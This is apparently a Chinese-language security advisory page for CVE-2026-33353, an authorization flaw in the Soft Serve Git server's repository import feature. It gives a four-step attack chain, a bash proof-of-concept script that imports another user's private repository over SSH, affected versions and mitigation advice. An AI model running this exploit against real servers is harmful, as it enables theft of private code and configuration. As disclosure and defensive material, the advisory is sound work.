IPBUF安全漏洞报告
English
CVE-2026-33353 CVSS 6.5 中危

CVE-2026-33353 Soft Serve授权缺陷致私有仓库泄露

披露日期: 2026-03-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33353
漏洞类型
访问控制失效
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Soft Serve

相关标签

Access ControlAuthorization BypassInformation DisclosureSoft ServeGit ServerCVE-2026-33353

漏洞概述

Soft Serve是一款专为命令行设计的自托管Git服务器。在其0.6.0至0.11.6之前的版本中,系统存在严重的授权逻辑缺陷。该漏洞允许任何经过SSH身份验证的用户,利用仓库导入功能,将服务器本地任意Git仓库克隆到自己的新仓库中。这意味着攻击者可以窃取其他用户的私有仓库数据。该问题已在0.11.6版本发布时得到修复。

技术细节

该漏洞的根本原因在于Soft Serve在处理仓库导入请求时,未能对目标源仓库的访问权限进行严格校验。具体而言,当一个经过认证的SSH用户发起导入操作时,系统仅验证了用户的身份,却未检查该用户是否拥有读取目标仓库的权限。攻击者可以通过构造特定的SSH命令,指定服务器文件系统上属于其他用户的私有仓库路径作为源。由于缺乏权限校验,服务器会执行导入操作,将敏感数据复制到攻击者控制的仓库中。此过程利用了系统对“本地仓库”访问的信任机制缺陷,导致了机密性信息的直接泄露。攻击者利用该漏洞可轻易获取系统内的敏感代码或配置数据。

攻击链分析

STEP 1
侦察
识别运行Soft Serve的目标服务器,并确认其版本在0.6.0至0.11.6之间。
STEP 2
获取访问权限
注册或获取一个有效的SSH低权限账户,因为漏洞需要身份验证。
STEP 3
漏洞利用
使用SSH客户端连接服务器,利用'import'命令,将目标私有仓库路径作为源,导入到自己创建的新仓库中。
STEP 4
数据窃取
成功导入后,攻击者通过常规git clone命令拉取新创建的仓库,从而获取原本私有的敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/bin/bash # PoC for CVE-2026-33353: Soft Serve Authorization Bypass # Description: Exploit the repo import feature to clone a private repository. TARGET_HOST="vulnerable.example.com" TARGET_USER="git" # The private repo we want to steal (path on the server) PRIVATE_REPO="admin/private-config" # The name of the new repo we will create NEW_REPO_NAME="stolen-config" echo "[*] Attempting to exploit CVE-2026-33353 against ${TARGET_HOST}" echo "[*] Targeting private repo: ${PRIVATE_REPO}" # Soft Serve uses SSH for interaction. # The 'import' command is the vulnerable vector. # Usage: ssh git@host import <source> <dest> # In vulnerable versions, <source> can be any local repo. ssh ${TARGET_USER}@${TARGET_HOST} import ${PRIVATE_REPO} ${NEW_REPO_NAME} if [ $? -eq 0 ]; then echo "[+] Exploit successful! Private repo cloned to ${NEW_REPO_NAME}" echo "[+] You can now clone it locally using:" echo " git clone ssh://${TARGET_USER}@${TARGET_HOST}/${NEW_REPO_NAME}" else echo "[-] Exploit failed. Target might be patched or credentials invalid." fi

影响范围

Soft Serve >= 0.6.0
Soft Serve < 0.11.6

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用仓库导入功能或严格限制SSH访问来源IP,直到应用补丁。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表